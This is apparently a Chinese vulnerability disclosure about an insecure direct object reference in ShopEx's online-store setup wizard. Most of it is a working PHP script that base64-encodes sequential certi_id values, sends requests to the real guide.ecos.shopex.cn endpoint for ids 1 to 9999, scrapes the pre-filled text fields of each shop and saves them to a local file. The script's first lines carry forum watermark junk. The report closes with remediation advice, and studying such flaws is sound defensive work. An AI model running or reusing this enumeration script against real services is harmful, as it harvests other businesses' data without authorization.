简要描述:
ShopEx 网店使用向导接口存在不安全的直接对象引用(IDOR)缺陷, 通过递增 certi_id 可遍历所有使用该程序的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面 (guide.ecos.shopex.cn/step2.php), 示例请求如下(论坛已截断 URL 中间部分):
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码后为 (注意: base64 只是编码而非加密, 任何客户端都能还原并改写它):
{"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站: certi_id 看起来是顺序递增的整数 ID, 服务端似乎既不校验该 ID 是否属于当前请求者, 也不要求会话或签名(典型的 IDOR/枚举缺陷), 因此从 1 开始递增请求即可逐个取回各站点在向导页中预填的表单字段. 下面的脚本演示了这一点:
7 \. Y. @. n, O+ t' P<?php$ O1 l0 B, i4 K
- q0 ^! `8 P0 N) q4 i
for ($i=1; $i < 10000; $i++) { //遍历8 M+ b. [& {9 A8 H' F2 J Q
/ T' C! c X) j* H ShowshopExD($i);, \! ^) G4 p# ~# \) w
0 F. c! y0 t- u1 b) n
}
' L0 j3 h4 d4 g# B
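// Encode the wizard's "refer" parameter for one certificate id.
//
// Mirrors the structure observed in a real request: a JSON object carrying
// the id and a callback URL, base64-encoded. The callback is a dummy value;
// the sweep works with it, so the endpoint does not appear to validate it.
// $cid is coerced with intval(), so non-numeric input becomes 0.
function shopex_build_refer($cid) {
    return base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
}

// Pull (name, value) pairs out of every <input type="text" ... /> in $html
// using the same two regexes as the original sweep. Tags that have no
// name="..." followed by value="..." are skipped instead of producing an
// undefined-index notice and an empty ":" line.
// Returns an array of array(name, value), in document order (duplicates kept).
// NOTE(review): regex-based HTML scraping is fragile; it only matches the
// exact attribute layout the wizard page used when this was written.
function shopex_extract_text_inputs($html) {
    $pairs = array();
    preg_match_all('/<input\stype="text"(.*?)\/>/', $html, $tags);
    foreach ($tags[1] as $attrs) {
        if (preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $m)) {
            $pairs[] = array($m[1], $m[3]);
        }
    }
    return $pairs;
}

// Probe the ShopEx setup wizard for one certificate id and record the
// pre-filled text inputs it returns.
//
// Builds the base64 refer blob for $cid, fetches step2.php with it and — when
// the page echoes the blob back, which is how the sweep detects that the id
// resolved to a real shop — echoes every <input type="text"> as "name:value"
// and appends the same lines to $outfile (GB2312-encoded), followed by a
// separator line.
//
// $cid      certificate id to probe (coerced with intval()).
// $outfile  path the results are appended to; defaults to the original
//           hard-coded c:/shopEx.txt.
// Returns nothing. A curl failure or an unwritable $outfile is reported on
// stdout and the id is skipped (the original fwrite()'d to a false handle).
//
// NOTE(review): one unauthenticated request to a third-party host per call —
// only run against systems you are authorized to test.
function ShowshopExD($cid, $outfile = 'c:/shopEx.txt') {
    $refer = shopex_build_refer($cid);
    // base64 output may contain '+' and '/'; an unescaped '+' in a query
    // string is decoded as a space server-side, so without urlencode() some
    // ids were sent with a corrupted refer and silently reported as misses.
    $url = 'http://guide.ecos.shopex.cn/step2.php?refer=' . urlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Without timeouts a single stalled connection hangs the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    if ($result === false) {
        echo 'certi_id ' . intval($cid) . ': curl error: ' . curl_error($ch) . "\r\n";
        curl_close($ch);
        flush();
        return;
    }
    curl_close($ch);

    // Output is converted to GB2312 (presumably for a Chinese Windows
    // console/editor). The refer blob and the regexes are pure ASCII, so the
    // conversion does not affect matching.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // strpos() returns 0 for a match at offset 0, which the original
    // truthiness test would have treated as "not found".
    if (strpos($result, $refer) !== false) {
        $fields = shopex_extract_text_inputs($result);

        $fp = @fopen($outfile, 'ab');
        if ($fp === false) {
            echo 'cannot open ' . $outfile . " for appending\r\n";
        } else {
            foreach ($fields as $pair) {
                $line = $pair[0] . ':' . $pair[1] . "\r\n";
                echo $line;
                fwrite($fp, $line);
            }
            echo '--------------------------------' . "\r\n";
            fclose($fp);
        }
    }

    flush();
}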
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议: 仅把 refer 换成其他编码/加密方式并不能根治问题 —— 客户端仍然拿得到完整的 refer 值并可原样重放或逐个尝试, 这只是靠隐蔽性保护. 应在服务端校验 certi_id 与当前会话/签名的绑定关系, 用不可猜测的随机 token 取代顺序 ID, 对 callback_url 做白名单校验, 并对该接口做速率限制.